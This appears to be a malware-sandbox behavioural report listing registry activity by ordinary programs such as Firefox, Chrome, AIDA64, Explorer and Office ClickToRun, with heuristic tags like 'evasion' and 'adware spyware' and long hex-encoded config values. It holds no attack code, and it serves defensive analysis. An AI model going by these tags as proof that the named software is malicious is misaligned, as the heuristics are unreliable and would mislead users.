Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\MsiExec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SYSTEM32\MsiExec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SYSTEM32\MsiExec.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\DESCRIPTION\System\BIOS C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion C:\Program Files (x86)\FinalWire\AIDA64 Extreme\aida64.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.13 = 64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e4973506572736f6e6150726f66696c65504358456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e52656d6f76654d53414148616e646c6572466f7254657874426f78222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5465616368696e6743616c6c6f757454696d654f6e53637265656e54656c656d65747279222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5468656d696e672e5573654d656469756d4c756d696e616e63655468726573686f6c64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5569614e6f74696669636174696f6e73466f72427573426172456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5558506c6174666f726d2e5569614e6f74696669636174696f6e73466f725465616368696e6743616c6c6f7574456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e566973696f2e484f50657266496d70726f76656d656e7473222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e57686174734e65772e454353446174614c6f61646564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3130304b42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3130304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d31304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d314742416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d314d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3530304b42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d3530304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d35304d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d354d42416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e4275666665724f6f6d5265616c6c79426967416374696f6e222c20225622203a2022696e7433325f747c3322207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e456e61626c655061747465726e73496e41746e74786e64222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e576f72642e52616973655569614175746f436f72726563744576656e7457697468456e74697265576f7264222c20225622203a2022626f6f6c7c3122207d205d2c2022464347726f75704d617022203a207b2022464347726f75704d61705f3122203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657231222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838333230323b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657232222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838323936373b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657233222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373838333231313b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657234222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383434343234393330373934313932373b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b656447726170686963734164617074657235222c20225622203a20227374643a3a77737472696e677c33323930323b303b303b303b383732353732343238343635343239363b323b303b303b303b303b3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e41697253706163652e426c6f636b6564477261706869637341646170746572436f756e74222c20225622203a2022696e7433325f747c3522207d205d2c2022464347726f75704d61705f3222203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e476c6f62616c5265736f75726365496e666f4361636865456e61626c6564222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e46696c65494f2e53686f756c644d69677261746546726f6d4f72617069222c20225622203a2022626f6f6c7c3122207d205d2c2022464347726f75704d61705f3322203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e437a656368456e746572707269736547726f757032222c20225622203a2022626f6f6c7c3122207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e5368617265642e4772616d6d6172436865636b696e672e4f7074696f6e4f766572726964652e6373222c20225622203a20227374643a3a77737472696e677c4772616d6d617220616e6420726566696e656d656e74733a3a53657875616c206f7269656e746174696f6e20626961733d3022207d205d2c2022464347726f75704d61705f3422203a205b207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e42697a426172222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173426f6f742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173446f63756d656e7452656164792d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e766173466c6f6f64676174652d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6963656e73696e674469616c6f6752656e65772d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6f63616c4f70656e446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734c6f63616c53617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f444253617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f6e6544726976654f70656e446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f6e65447269766553617665446f63756d656e742d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f757453706163654f70656e2d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d43616e7661734f757453706163655361766541732d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d466c6f6f6447617465222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f66666963652d496e41707050757263686173652d57696e3332222c20225622203a2022626f6f6c7c3022207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54617267657465644d6573736167696e672e456e61626c65537572666163652e4f75745370616365222c20225622203a2022626f6f6c7c3022207d205d207d207d C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018400FA7157F67 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb0100000006c260b99474614fad9fe56f63a9fd890000000002000000000010660000000100002000000083ec0fd16caad817353a1eff3bec9bc045ed6f1e19303ba22fb05e84f90a8c57000000000e80000000020000200000006b50611442c0df1ce1a43e1208f69c6187924a78f3e7d195cf4d88500c7e4545800000009af0b0780f3b57f3309399f3451ffe3f710e40fec64301e3c42e6e9ba3e122fb8ac6ea3b4a0b2fe8e66f467705d9b469013d780b46e0f03ed76a6e58070f2373920bb18f1f2695281381440d71497a185f90c3caba29e7e42ecf4fe0a5ca10e4855725eced2fa32fe73ddcb312d16ce2128870f1e88fa74119b4d4556d54faca40000000afc72addbc2d2856937acc12486307a3fa29a699b12943d0aa9f65c5c5195179f2bdbe2ff90969197de825e89415e1850c01dea48cb645c8f927e3aa67d2b502 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\all\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.7 = 735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e6447657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657455736572417474726962757465735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e645365744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065725365744c696e6b735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e644765745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065724765745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572456e645365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c7065725365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572436865636b5065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657453686172696e67496e666f726d6174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c706572426567696e5365745065726d697373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434d736f53686172696e675365727669636548656c70657247657453686172696e6756657273696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f6465726e4261636b73746167655c22203a207b205c224576656e74735c22203a207b205c224261636b737461676550616765436f6e74726f6c55736572437265617465436f6e74726f6c557365725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f704261636b73746167654e617669676174696f6e5c22203a207b205c224576656e74735c22203a207b205c224e617669676174696f6e5461736b496e766f6b655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225461736b496e766f6b654f6e52656164466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224465736b746f7053686172696e675c22203a207b205c224576656e74735c22203a207b205c22436f6c6c616250616e6555736572536574436f6c6c616250616e654d6f64655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c616250616e6555736572436c69636b53686172696e674c696e6b5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f6c6c616250616e6555736572497343757272656e74446f63456e746572707269736550726f7465637465645c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22446f63756d656e7473536861726564576974684d655c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e7473536861726564576974684d6552657175657374446f63756d656e7473536861726564576974684d654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d6552657175657374436163686564446f63756d656e7473536861726564576974684d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d654964656e74697479436163686552657175657374526573756c745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7473536861726564576974684d6552657175657374436163686564446f63756d656e7473466f724661696c757265735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22486973746f727955585c22203a207b205c224576656e74735c22203a207b205c224163746976697479506167654d616e6167657252656769737465725669736962696c697479436f6e74726f6c6c65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224275734261724f70656e4c6f63616c56657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434163746976697469657341676772656761746f72496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22434163746976697469657341676772656761746f7252657475726e4572726f725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243437369446f63756d656e74537461746545787465726e616c556e7265676973746572446f63756d656e744c697374656e65725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243486973746f727941637469766974696573466163746f727952656672657368416674657252656e616d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f62616c744163746976697469657346696c6556657273696f6e4c697374557064617465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243536f61704461746150726f7669646572496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436c6f73655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436f707956657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765436f707956657273696f6e496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f7279506167654372656174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616765526573746f726556657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f72795061676553656c65637456657273696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22486973746f727950616e654e6f6e436c69636b61626c654974656d53656c65637465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f63616c41637469766974696573426567696e526566726573685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224f6666696365436f6c6c61624163746976697479436f6d6d616e644d534f446f63756d656e7450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225368617265506f696e74436865636b4f757446696c65546f4c6f63616c466f6c6465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f67676c65486964655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f67676c6553686f775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225759574143616c6c6f757453686f7743616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747943616c6c6f757450726573656e7443616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e41637469766974794765744c6173745669657754696d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747946696e6443757272656e74557365724c6f67696e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22556e7365656e416374697669747943616c6c6f7574436c69636b65645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253686f77536d616c6c53637265656e435759574143616c6c6f75745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d7275416461707465725c22203a207b205c224576656e74735c22203a207b205c224872416464446f63756d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c6163655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e74576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c616365576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e745061746857697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c6163655061746857697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464446f63756d656e74496e6465785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464506c616365496e6465785c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22487252656d6f7665506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224872416464576974684f7074696f6e7357697468436f6e746578745c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c22417070446f63735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e745c22203a207b205c225375624e616d657370616365735c22203a207b205c2241637469766174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6173744f70656e6564446f63756d656e744d657461646174615c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c224d6f6465726e446f6354656d706c617465536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225361766550726f6d707448656c7065725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e74436861745c22203a207b205c224576656e74735c22203a207b205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572436f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572436f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572446973636f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e6572446973636f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e63496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e65725265667265736850657273697374656e7453746174654173796e6352657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e657253746172745265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e7443686174417661696c6162696c6974795274634c697374656e657253746f705265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572436f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572436f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572446973636f6e6e65637465644576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572446973636f6e6e656374696e674576656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e7453746174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e745374617465496e7465726e616c5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e74537461746552657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f6164636173746572526562726f61646361737450657273697374656e7453746174655265747279496e6e65724c6f6f705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f61646361737465725265667265736850657273697374656e7453746174654173796e635c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f616463617374657253746172745265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f63756d656e744368617452746342726f616463617374657253746f705265616c74696d65436f6e6e656374696f6e4c697374656e696e675c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253686172696e6755495c22203a207b205c225375624e616d657370616365735c22203a207b205c22436f6c6c616250616e65557365725c22203a207b205c224576656e74735c22203a207b205c22536861726550616e65436f6d706c657465446973706c61795c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c2253686172654469616c6f675c22203a207b205c224576656e74735c22203a207b205c224e61766967617465546f5765624469616c6f675c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e6441734174746163686d656e745c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d2c205c224544505c22203a207b205c224576656e74735c22203a207b205c22506f6c6963794d657461646174615c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d2c205c225369746573536572766963654170695c22203a207b205c224576656e74735c22203a207b205c22526571756573744173796e635c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265616446726f6d43616368655c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e44796e616d696343616e766173222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224f7574537061636543616e7661735c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2250726f677265737355695c22203a207b205c224576656e74735c22203a207b205c22556e6578706f727461626c655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224578706f727461626c655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2243616e7661735c22203a207b205c225375624e616d657370616365735c22203a207b205c225765624469616c6f675c22203a207b205c225375624e616d657370616365735c22203a207b205c2242726f777365724576656e7448616e646c65725c22203a207b205c224576656e74735c22203a207b205c224f6e4c6f616465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224e617669676174696f6e48616e646c65725c22203a207b205c224576656e74735c22203a207b205c224f6e4e61766967617465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e457863656c222c20225622203a20227374643a3a77737472696e677c7b205c C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
